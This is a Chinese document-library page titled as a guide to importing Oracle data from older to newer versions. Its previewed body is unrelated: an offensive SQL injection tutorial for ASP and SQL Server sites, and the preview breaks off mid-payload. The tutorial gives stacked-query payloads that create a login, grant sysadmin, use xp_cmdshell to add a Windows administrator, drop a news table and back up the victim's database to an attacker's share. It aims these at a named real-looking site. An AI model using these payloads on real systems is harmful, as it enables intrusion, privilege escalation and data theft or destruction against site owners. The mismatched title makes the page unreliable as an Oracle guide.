返回
oracle数据库从低版本导入高版本的方法

oracle数据库从低版本导入高版本的方法

ID:34725125

大小:67.68 KB

页数:8页

时间:2019-03-10

oracle数据库从低版本导入高版本的方法_第1页
oracle数据库从低版本导入高版本的方法_第2页
oracle数据库从低版本导入高版本的方法_第3页
oracle数据库从低版本导入高版本的方法_第4页
oracle数据库从低版本导入高版本的方法_第5页
资源描述:

《oracle数据库从低版本导入高版本的方法》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库

1、数据库链应用实例:将一台机器的Oracle7数据库中的数据导入到另一台机器的Oracle9i中去?http://www.dayoo.com/http://www.dayoo.com/2010-05-2111:55来源:电子商务发表评论 (0)    SQL数据库的一些攻击具体内容:  对于国内外的很多新闻,BBS和电子商务网站都采用ASP+SQL设计,而写ASP的程序员很多(有很多刚刚毕业的),所以,ASP+SQL的攻击成功率也比较高。这类攻击方法与NT的版本和SQL的版本没有多大的关系,也没有相应的补丁,因为漏洞是程序员自己造成的,而且大多数讲解ASP编程的书上

2、,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对SQL的请求,就留下后患无穷!这种攻击方法最早源于or1=1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;execsp_addloginhax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的SQLServer账号是个管理员,其次请求的提交变量在整个SQL语句的最后,因为有一些程序员采用SELECT*FROMnewsWHEREid=...ANDtopic=...AND.....这种方法请求数据库,那么如果还用以上的例子就会news.asp?id=

3、2;execsp_addloginhax变成SELECT*FROMnewsWHEREid=2;execsp_addloginhaxANDtopic=...AND...整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方法news.asp?id=2;execsp_addloginhax;--后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!那么我们连一起来用吧news.asp?id=2;execmas

4、ter.dbo.sp_addloginhax;--news.asp?id=2;execmaster.dbo.sp_passwordnull,hax,hax;--news.asp?id=2;execmaster.dbo.sp_addsrvrolemembersysadminhax;--news.asp?id=2;execmaster.dbo.xp_cmdshellnetuserhaxhax/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--news.asp?id=2;e

5、xecmaster.dbo.xp_cmdshellnetlocalgroupadministratorshax/add;--这样,你在他的数据库和系统内都留下了hax管理员账号了当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。以后我们会讨论,如果对方的ASP不是用SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵当然大家可以试试看在id=2后面加上一个符号,主要看对方的ASP怎么写了再说说当ASP程序使用的SQL账号不是管理员的时候我们该如何做。你如天融信的主页,有新闻内容,如下:http://www.talenti

6、t.com.cn/news/news-2.asp?newid=117大家可以试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;select123;--呵呵,报语法错误,select123错误,显而易见,天融新的ASP在newid变量后面用号结束那么试试看http://www.talentit.com.cn/news/news-2.asp?newid=117;deletenews;--哈哈,我想只要表名猜对了,新闻库就被删了通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库

7、有很高的管理权限但是我们不知道库名该怎么?看看db_name函数吧打开你的queryanalyzer,看看printdb_name,呵呵,当前的数据库名就出来了以次类推,如下:declare@asysname;set@a=db_name;backupdatabase@atodisk=你的IP你的共享目录bak.dat,name=test;--呵呵,他的当前数据库就备份到你的硬盘上了,接下来要做的大家心里都明白了吧同理这个方法可以找到对方的SQL的IP先装一个防火墙,打开ICMP和139TCP和445TCP的警告提示然后试试看news.asp?id=2;execma

8、ster.

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。